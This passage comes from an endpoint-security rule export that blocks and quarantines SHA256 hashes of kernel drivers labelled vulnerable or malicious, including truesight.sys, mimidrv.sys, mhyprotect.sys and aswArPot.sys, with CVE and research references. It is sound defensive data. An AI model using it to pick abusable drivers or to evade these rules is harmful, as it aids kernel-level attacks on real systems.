+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e434abe6-b708-509f-bbaa-2fc7db032dd2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825316Z",
+ "creation_date": "2026-03-23T11:45:30.825319Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825327Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7eedcffe6307d3ed362abccdba78c801f02eb6e1ec409b350c85b46af6cb78a8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e439795b-3935-5d3e-9a77-acddecf92b81",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145921Z",
+ "creation_date": "2026-03-23T11:45:31.145924Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145932Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2dc4b9468188d2f82162d605bf5ee5cd15826af5758708dc4df9260c3e301afd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e43bd353-9a22-5267-ab25-e86d8cb33707",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495632Z",
+ "creation_date": "2026-03-23T11:45:31.495635Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495643Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "090c615cc3e63a3960f7ecaad8db7305308a6b38e1a4648a24f75f39a9d59318",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e43e1132-eb39-5857-b0b2-dde3cb8248c4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149536Z",
+ "creation_date": "2026-03-23T11:45:31.149539Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149549Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea1393cb9e0e2e0dcb9447803ef545cd15450888e3d11b95687fec5e7120951c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e4540ad0-a322-51ff-827a-e623ea00cf0c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613824Z",
+ "creation_date": "2026-03-23T11:45:29.613826Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613831Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "20c87381f8f0bf953cb109a5d50a2184c0104cc8ab30e2f94dfba89a5d19b9d8",
+ "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e466229e-6f49-5adb-a49b-76ca430abbee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469571Z",
+ "creation_date": "2026-03-23T11:45:30.469575Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469583Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2c5c067497a0490e9fe79d0e4f9f759af93138b1a0bea08a89af09e119390c7a",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e46a6add-3fef-53a3-8afa-9bddb547f6e4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482454Z",
+ "creation_date": "2026-03-23T11:45:31.482458Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482467Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "89df4a4c238e810dfce318f53f61f4837c821f3b6387e82be653d59f1e5202d6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e46c1780-5889-5489-8813-2669a63d87e3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149336Z",
+ "creation_date": "2026-03-23T11:45:31.149338Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149344Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c610def6e9b350c198eeaa929743e1ba961cca04eff5a65b1e5b5eeed71f7d1b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e46e1ee8-407f-5dfb-be22-a02a191749d3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494457Z",
+ "creation_date": "2026-03-23T11:45:31.494459Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494465Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5c095dcbe167ec1a6b128d565954da5d68361780afdf89286860a572bd8210d2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e47e8046-bdf5-52bf-9223-b5e9683b73ab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151498Z",
+ "creation_date": "2026-03-23T11:45:31.151501Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151511Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0b2007739377d936d092b86d05f8cbaaf72330033d9a1601fa7b0dda4923f927",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e49510a1-37c7-5849-9ccb-d9d46952dcb4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811933Z",
+ "creation_date": "2026-03-23T11:45:31.811936Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811941Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a277340559f47f2bb547268d30d302864d7b80600e0331d242b29235001b1048",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e4961f21-2f5d-5aa2-9b5f-dd803d0955f3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972198Z",
+ "creation_date": "2026-03-23T11:45:29.972202Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972210Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "785e87bc23a1353fe0726554fd009aca69c320a98445a604a64e23ab45108087",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e498e987-6b6c-5fc7-9dc9-a930230ad597",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818683Z",
+ "creation_date": "2026-03-23T11:45:30.818686Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818691Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9e855f9d5f5f4dc9420f34045df5d2c70498468f076d873571fc62e4015e38d3",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e4a155ab-6117-5a67-97f2-60f2054ca123",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977374Z",
+ "creation_date": "2026-03-23T11:45:29.977376Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977382Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "082d4d4d4ba1bda5e1599bd24e930ae9f000e7d12b00f7021cca90a4600ea470",
+ "comment": "Vulnerable Kernel Driver (aka ProtectS.sys) [https://www.loldrivers.io/drivers/99668140-a8f6-48f8-86d1-cf3bf693600c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e4a22f12-95f2-5f71-bff3-25ce095bebe2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494728Z",
+ "creation_date": "2026-03-23T11:45:31.494730Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494735Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aa0014bf98d3e807ad05fd465c160b2e2a6fc85b63cab8b44571d54636a1a684",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e4a40c04-3718-5057-b001-f426504b92be",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461781Z",
+ "creation_date": "2026-03-23T11:45:30.461784Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461793Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "14bd76f66fe5749d1812f7cf47cc5f9a8a830c53a7ede5e42a14a4140a70f5d2",
+ "comment": "Vulnerable Kernel Driver (aka mhyprotect.sys) [https://www.loldrivers.io/drivers/7abc873d-9c28-44c2-8f60-701a8e26af29/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e4a78d58-c104-5488-9b9d-410cadce7b04",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828155Z",
+ "creation_date": "2026-03-23T11:45:30.828157Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828162Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0ca522bfa1a08f92ad68c77df2ec585452072d87484ae93f778df07af19cf76f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e4a9cb56-a3ad-5750-911b-70ad2ddc2b75",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827954Z",
+ "creation_date": "2026-03-23T11:45:30.827957Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827965Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3807e9a1bc159b9e8fc0c7caad10d7213ff8ed8ad1cea9ea552b093c81bf624b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e4abfe1c-cac0-591d-9f9c-8f685868374f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615255Z",
+ "creation_date": "2026-03-23T11:45:29.615257Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615262Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6f96c129eb96bc4df9a7d247a98fecb9a3801dde63281ac1aba3d2ef869d32a5",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e4b0afa1-1623-5c44-b245-093aa1840e4b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976482Z",
+ "creation_date": "2026-03-23T11:45:29.976484Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976490Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "43374fd68dc06c8491b16d177156444ee44f497bbceafd0165f40ba48bf6802f",
+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e4b80841-e72b-579a-ac61-f40f15e9d523",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148899Z",
+ "creation_date": "2026-03-23T11:45:31.148901Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148906Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "da991abd9e1c29dd2a1dc0052222d7ca680ef98f7b953ee2f1c97e2edd189c43",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e4ba60c3-c528-5fbf-815c-3171b5cfad2f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968545Z",
+ "creation_date": "2026-03-23T11:45:29.968547Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968552Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2594b3ef3675ca3a7b465b8ed4962e3251364bab13b12af00ebba7fa2211abb2",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e4beb15d-1ab2-5965-92a3-ede31f804fe9",
